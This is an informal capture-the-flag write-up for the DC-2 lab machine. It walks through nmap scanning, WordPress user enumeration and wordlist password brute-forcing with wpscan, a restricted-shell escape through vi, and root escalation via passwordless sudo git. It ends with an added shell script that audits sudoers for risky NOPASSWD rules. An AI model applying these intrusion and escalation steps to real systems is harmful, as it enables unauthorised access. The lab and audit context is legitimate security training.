you can download it here: http://www.five86.com/downloads/DC-2.zip

use nmap to discover the target:
nmap -Pn 192.168.227.0/24


check its port 80:


there is a 301 redirect to hostname dc-2, i guess the webserver is resolving dc-2 as web’s hostname, need to edit the local host file;
echo "192.168.227.135 dc-2" >> /etc/hosts
lynx http://192.168.227.135/, now working:


it is a wordpress site.
check the post named “Flag”


seems like I need to bruteforce the users’ password with customized password file specifically designed for this website.
I used cewl to generate the customized password file;


use wpscan to enumerate all the users:
wpscan --url http://dc-2/ -e u


use wpscan to bruteforce credentials
wpscan --url http://dc-2/ -U user.txt -P password.txt


log in as jerry, there is a private page:


seems that wordpress is not exploitable
stuck here for a while, decided to do a port scan
nmap -T4 -p 1-65535 192.168.227.135


check 7744 port


it is an OpenSSH server, log in as tom


shell is restricted under /home/tom/usr/bin, only a few commands are available:

can use vi to escape the restriction by setting shell environment in vi:
vi flag3.txt


executing ":set shell=/bin/bash" followed by ":shell" allows me to escape the restriction:


according to flag3.txt, I need to execute the command as jerry, try su jerry, and use his credential from wordpress


jerry can execute git as root (sudo) without a password, and git can be used to escalate privilege:
sudo git help add, then use the same method as with vi to escalate privilege:
!command # it will be executed as root

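
A defender-side check for the misconfiguration used in the last step, as an added example that is not part of the original write-up: it scans sudoers-style rules for NOPASSWD entries that point at programs with a shell or pager escape. The sample rules, the /usr/bin/git path and the list of risky programs are constructed assumptions.

```shell
#!/bin/sh
# Added example: flag passwordless sudo rules for programs that can spawn a shell.

# Programs with a shell or pager escape. Illustrative list, not exhaustive.
RISKY="git vi vim less more man"

# Constructed sample rules; the jerry/git line models the rule on this box
# (the /usr/bin/git path is an assumption).
sample_sudoers() {
    cat <<'EOF'
# constructed sample
root    ALL=(ALL:ALL) ALL
jerry   ALL=(root) NOPASSWD: /usr/bin/git
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less /var/log/syslog
%admin  ALL=(ALL) NOPASSWD: ALL
deploy  ALL=(root) /usr/bin/vi
EOF
}

# Read sudoers-style lines on stdin; print "user: command" for every
# NOPASSWD rule that grants ALL or a program named in $RISKY.
audit_sudoers() {
    awk -v risky="$RISKY" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
        /^[ \t]*#/   { next }   # comment
        /^[ \t]*$/   { next }   # blank line
        !/NOPASSWD:/ { next }   # password still required
        {
            user = $1
            rest = $0
            sub(/.*NOPASSWD:[ \t]*/, "", rest)       # keep the command list
            m = split(rest, cmds, /[ \t]*,[ \t]*/)   # one entry per command
            for (i = 1; i <= m; i++) {
                split(cmds[i], parts, /[ \t]+/)      # parts[1] is the path
                k = split(parts[1], seg, "/")        # seg[k] is the basename
                if (parts[1] == "ALL" || (seg[k] in bad))
                    print user ": " parts[1]
            }
        }'
}

sample_sudoers | audit_sudoers
```

On a real host, feed it the output of `cat /etc/sudoers /etc/sudoers.d/*` as root; aliases and included files are not expanded by this check.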